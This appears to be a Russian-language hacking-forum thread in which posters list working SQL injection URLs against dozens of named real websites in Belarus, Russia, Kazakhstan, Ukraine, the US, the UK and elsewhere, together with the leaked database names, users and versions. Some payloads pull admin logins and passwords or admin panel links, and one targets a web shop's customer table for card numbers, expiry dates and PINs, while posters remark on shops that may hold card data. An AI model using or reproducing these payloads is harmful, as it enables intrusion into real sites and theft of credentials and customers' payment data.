Нашёл одну контору, которая занимается дизайном и разработкой сайтов, и, естестенно: Code: http://www.cycling.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: cyclingby user: cyclingby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.gelatin.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: gelatinby user: gelatinby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.gelatin.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: gelatinby user: gelatinby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.nissan-belarus.by/page.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: nissanbelarusby user: nissanbelarusby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.zaym.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: zaymby user: zaymby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.omkk.by/page.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: omkkby user: omkkby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.skpf.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(database(),14)a)a)a) database: skpfby user: skpfby@localhost version: 5.0.51a-24+lenny2+spu1 Интересующая таблица: cms_system_users колонки: login, password На всех сайтах!!!
И ещё: http://www.ruralbelarus.by/menu.php?form_id= http://zaym.by/menu.php?form_id= http://www.milkpolys.by/menu.php?form_id= http://www.narochbereg.by/ http://www.web-energo.by/firm.php?form_id= http://www.narochbereg.by/menu.php?form_id= http://www.avmir.by/product.php?form_id= http://www.sovartus.by/menu.php?form_id= http://www.vint.by/menu.php?form_id= http://www.bkpp.by/menu.php?form_id= http://www.tehnoviza.by/menu.php?form_id= http://jurexpress.by/menu.php?form_id= http://www.diapal.by/menu.php?form_id= http://buzil.by/page.php?form_id= http://www.hefter.by/menu.php?form_id= http://www.mila-style.by/page.php?form_id= http://www.amtechreklama.by/menu.php?form_id= http://zub.by/menu.php?form_id= http://www.iti.by/menu.php?form_id= http://www.prishcepka.by/menu.php?form_id= http://www.bva.by/menu.php?form_id= http://cagia.by/menu.php?form_id= http://britex.by/menu.php?form_id= http://www.belmoris.by/news.php?form_id= http://www.filterbel.by/menu.php?form_id= http://ivushka.by/menu.php?form_id= http://www.oknastyl.by/page.php?form_id= http://gorksm.by/menu.php?form_id= http://my-dom.by/menu.php?form_id= http://www.dudutky.by/menu.php?form_id= http://www.hefter.by/menu.php?form_id= http://www.tehnoviza.by/menu.php?form_id= На всех скуля) Code: http://elekt.vitebsk.by/menu.php?form_id=-1+union+select+1,2,version()+--+ database: elektvitebskby user: elektvitebskby@localhost version: 5.0.51a-24+lenny2+spu1 Code: http://www.agrosemproduct.by/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version(),0x3a,database()),3,4+--+ agrosemproductby@localhost:5.0.51a-24+lenny2+spu1:agrosemproductby Code: http://www.belproduct.com/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version(),0x3a,database()),3,4+--+ belproductcom@localhost:5.1.34-community-log:belprod_php Code: http://www.transelektrokomplekt.by/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version(),0x3a,database()),3,4+--+ transelektrokomp@localhost:5.0.51a-24+lenny2+spu1:transelektrokomp Code: http://www.milena.by/menu.php?form_id=-1+union+select+1,2,group_concat(user(),0x3a,version(),0x3a,database()),4+--+ milenaby@localhost:5.0.51a-24+lenny2+spu1:milenaby
Новая пачка инъекций=) Улыбнуло то, что когда написал idsub=-1 открылась страница с надписью "Hazker?" Code: http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1 database: medaarr_kip user: [email protected] version: 4.1.22-standard-log Code: http://www.newtoys.ru/form_work/?id_form=-1+union+select+1,2,3,4,5+--+ database: newtoysr_main version: 4.0.27-log user: newtoysr_main@localhost Code: http://www.krim24.org.ua/index.php?comm=form&id_form=-1+union+select+1,2,3,4,group_concat(database(),0x3a,user(),0x3a,version())+--+&text_ID=200&top_i_n=5 database: togoz212_krim24 user: togoz212@localhost version: 5.0.89-community-log Code: http://www.feedex.ru/form_work/?id_form=-1+union+select+1,2,user(),4,5+--+ database: feedexru_base user: feedexru_bear@localhost version: 4.0.27-log Code: http://www.vamnadom.ru/index.php?num=-1+union+select+1,group_concat(database(),0x3a,user(),0x3a,version()),3,4,5+--+ database: vamnadom_mains user: vamnadom_bear102@localhost version: 5.0.77-log Code: http://www.inetrostov.ru/main/?fln=-1+union+select+1,2,group_concat(database(),0x3a,user(),0x3a,version()),4+--+ database: inetrost_mnir user: inetrost_mnbr@localhost version: 5.0.77-log
Code: http://fature.net/release.php?id=-1+union+select+1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+ database: fature_net version: 5.0.32-Debian_7etch11-log user: [email protected] Code: http://www.wiebetech.com/pressreleases/release.php?id=-1+union+select+1,2,3,4,group_concat(database(),0x3a,user(),0x3a,version()),6,7,8,9,10,11,12,13,14,15,16+--+ database: webphp version: 4.1.22 user: webphp@localhost Code: http://www.webbyawards.com/press/press-release.php?id=-1+union+select+1,2,3,4,5+--+ database: webby_01 version: 5.0.45 user: rodger@localhost
устал((((( Code: http://guernseyhobbysupplies.com/shop.php?moreinfo=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+ version: 5.0.89-COMMUNITY database: WEB35-VMM user: WEB35-VMM@LOCALHOST Code: http://www.vanzintruckaccessories.com/shop.php?product=-1+union+select+1,2,3,4,concat(database(),0x3a,user(),0x3a,ver sion()),6,7,8,9,10,11,12,13,14,15,16,17+--+&category= version: 5.0.67-community-nt database: vanzin user: vanzin@localhost Code: http://ism.ie/shop.php?page=category&action=view&category_id=-1+union+select+1,concat(database(),0x3a,user(),0x3a,ver sion()),3,4,5,6,7,8,9,10,11,12,13+--+ version: 5.0.45-community-nt database: ism09 user: ism_admin@localhost Code: http://www.hotcan.com/shop.php?product=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6,7,8+-- + version: 5.1.34-community database: hotcan user: hotcan@localhost Code: http://eminenceonline.com/site/shop.php?pID=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20+--+ version: 5.0.45 database: eminence_cmsDB user: eminence_cms@localhost Blind Code: http://www.thewcp.co.uk/shop.php?CatID=176+and+substring(version(),1,1)=4 Code: http://www.nabatorganic.com/store.php?id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a)+as+t+JOIN+(SELEC T+NAME_CONST(user(),14)a)a)a)&cat_id=13&expanddiv=13 version: 5.0.51a-3ubuntu5.4 database: nabat user: nabat@localhost Code: http://www.toprxsavings.com/store/src/store.php?prog=products&a=preview&id=-1+union+select+1,concat(database(),0x3a,u ser(),0x3a,version()),3,4,5,6,7,8,9,10,11+--+&cat=117&in_template=1&nocache=MXR1250434392QGBGAS2009/08161250434392&id ioma=ENG version: 4.1.22-standard database: savings_tienda user: savings_4dm1n@localhost Code: http://www.oldgaspump.com/store.php?section=1&catid=340&id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a )+as+t+JOIN+(SELECT+NAME_CONST(user(),14)a)a)a) version: 5.0.51a-3ubuntu5.5 database: vicsplace user: vicsplace@localhost Code: http://www.myesterna.com/store.php?action=showsubcat&id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,versio n()),4+--+ version: 4.1.22-max-log database: myestdb user: [email protected] Code: http://www.bidstant.com/store.php?id=-1+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+--+ version: 5.0.67-community database: bidstantauc user: adminbid@localhost Code: http://www.houstonbluessociety.org/store.php?Id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(database()))+--+ version: 4.1.16 database: houstonbs user: admin@localhost В конце исходного кода: Code: http://www.pbmperformance.com/store.php?catId=-1+union+select+user(),2,3,4,5,6+--+&parent=-1 version: 4.1.22-standard database: pbmerson_main user: pbmerson_admin@localhost Code: http://www.shangrila-plaza.com/store.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+ version: 5.0.45 database: shangrilamall user: shangrilamall@localhost
Минут пять не мог понять как раскрутить инъекцию xD Code: http://lidashoes.com/index/news/cor/env/id/eq/-1'+union+select+1,2,3,4,5+--+' version: 4.0.25-standard database: lidashoe_lidashoes user: lidashoe@localhost Code: http://polly.by/index/catalogue/env/r_id/eq/-1'+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6+--+' version: 4.0.25-standard database: pollyby_polly user: pollyby@localhost Code: http://www.vesta.by/index/news/cor/env/id/eq/-1'+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5+--+' version: 4.0.25-standard database: vestaby_vesta user: vestaby@localhost Ну и такие вроде бы все сайты разработанные фирмой proximalogic. Линк на их портофолио: http://www.proximalogic.com/index/portfolio/ "Преимущества работы с нашей организацией Многолетний опыт стабильной работы. Профессиональная команда способная решить любые задачи. Использование самых современных и передовых технологий." Я в тоске... P.S. и у них на сайте тоже есть скуля хDDDD Code: http://www.proximalogic.com/index/news/cor/env/id/eq/-1'+union+select+1,2,3,4,5,6+--+' database: proxima_proxima user: proxima@localhost version: 4.0.25-standard
и скуля напоследок и надо идти спать: Code: http://www.limex.by/?production&dept_id=-1+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14+--+ database: limex_limex user: limex_limex@localhost version: 5.0.89-community
Code: http://www.semsk.kz/newscat.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(database(),0x3a,user(),0x3a,version())+--+ version: 5.0.77 database: semsk_main user: semsk_main@localhost Code: http://ymo.su/newscat.php?id_category=-1+union+select+1,2,3,4,5,concat(database(),0x3a,user(),0x3a,version()),7,8,9,10,11,12,13,14,15,16+--+&id_region=1 version: 5.0.67-log database: u141802_ia user: [email protected]
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Забугорный шоп, возможно наличие СС. Code: http://sales.capitalsoundandlight.com/product.php?id=-7+union+select+UNHEX(HEX(concat_WS(0x3a,Version(),Database(),user()))),2-- Version: 4.1.14 User: CSL DataBase:csl@localhost 2 -===- Тут уже всё раскручено. Версия пятерка. Code: http://www.bigcheez.com.au/buy_print.php?id=1&item=32+and+1=0+union+select+1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9+from+user-- -===- Шоп свежий. СС пока что нету. Версия: 4 Code: https://www.xmission.com/~kensandersrarebooks/inventory_buy.php?id=16946+and+1=0+union+select+1,2,3,concat_ws(0x3a,bill_firstname,bill_lastname,bill_address,bill_city,bill_state,bill_zip,bill_country,cc_name,cc_number,cc_expiry,cc_pin),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+customers-- -===- Version = 4.1.22-standard Current User = academy_webmaste@localhost Current Database = academy_efm PR: 4 Code: http://www.efmacademy.nl/index.php?id=4&subid=56+and+1=0+union+select+1,2,3,4,5,6,7+from+admin--
Это была пожалуй самая замедрёная моя инъекция... но интересны же те инъекции, проводя которын ты скуриваешь полпачки, а то и пачку сигарет... Собственно на одном форуме человек чей ник Like A Boss (thnx ему) запостил скулю, а вернее просто линк и кавычку, т.к. провести её он, как я понял, не смог. И вот, собственно этот линк: Code: http://connexions.oberon.titaninternet.co.uk/pages.php?id=1048' Ну я подумал, и решил, что надо глянуть. Ну как обычно начал подбирать кол-во столбцов... И снова редирект. Решил попробывать подобрать с помощью программы dumper. Подобрал. 14. Там же и принтабельную колонку нашло(11. Туда я сразу вписал version() ). Но нажав на mysql info я получил сообщение Unknown trouble. Ну тут я начал выдумывать всякие разные конструкции... Ничего не получалось... редирект. И тут я подумал, а что если везде поставить null. Поставил, убрал and 1=2, но и всё равно ничего не вышло. Поставил снова and 1=2, и решил менять по одному значия null'ов на 1,2,3... Когда вместо первого null'a я подставил 1, я получил Error 404 Not found. Тут я расстроился, и решил бросить это дело, но тут я обратил внимание на урл. И что я вижу: http://connexions.oberon.titaninternet.co.uk/4.0.20-standard. Вот такая вот скуля) version: 4.0.20-standard user: connexionsberks@localhost database: connexions-berkshire
PR: 4 Version: 5.0.77 Code: http://www.helplinelaw.com/docs/nplog.php?id=CANV3+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email),8,9,10,11+from+admin-- Админка: Code: http://helplinelaw.com/adminonline/index.php -===- ТиЦ: 20 PR: 4 Code: http://www.eco-tourism.kz/content.php?id=109+and+1=0+union+select+1,2,concat_ws(0x3a,username,password),4+from+tb_users-- -===- PR: 4 user: anthony_iching@localhost version: 5.0.67-community database: anthony_anthony Code: http://www.ichingoracle.com/show_book.php?ID=23+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,0,1--
http://univd.edu.ua/index.php?lan=ukr&id=-1+union+select+1,unhex%28hex%28concat_ws%280x3a,Login,password,name,category_id,active,email,region,city,phone,id,name,count_open,old_date,url%29%29%29,3+from+users--
Code: http://musakov.ru/inc/ind.php?page=3&exist=1&year=2008&id=-1+union+select+1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7 musakov:musakov@localhost:4.1.20-lk-log
Code: http://board.titaeva.ru/ind.php?id_categ=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+&tr=1 4.1.25-log:titaeva8_user1@localhost:titaeva8_base1 Code: http://www.bazasuper.ru/dosk/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,14,14,15,16,17,18,19,20,21,22,23+--+&tr=1 5.0.32-Debian_7etch8-log:u2478@localhost:u2478_bazasuper Code: http://www.kuchamala.info/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1 5.0.51a-community:forexsta_alex@localhost:forexsta_doska Code: http://www.cqham.sumy.ua/board5/ind.php?id_categ=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&tr=1 5.1.33:cqham@localhost:cqham
Исчо) Code: http://maximstroy.ru/catalog/ind.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11+--+ 5.0.67-log:[email protected]:u72532_2 Code: http://www.electro-sila.ru/board/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+ 5.0.67-log:[email protected]:u29186_2
http://global.usf.edu/educationabroad/progInfo.php?prog_id=-75+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- version 4 help us please
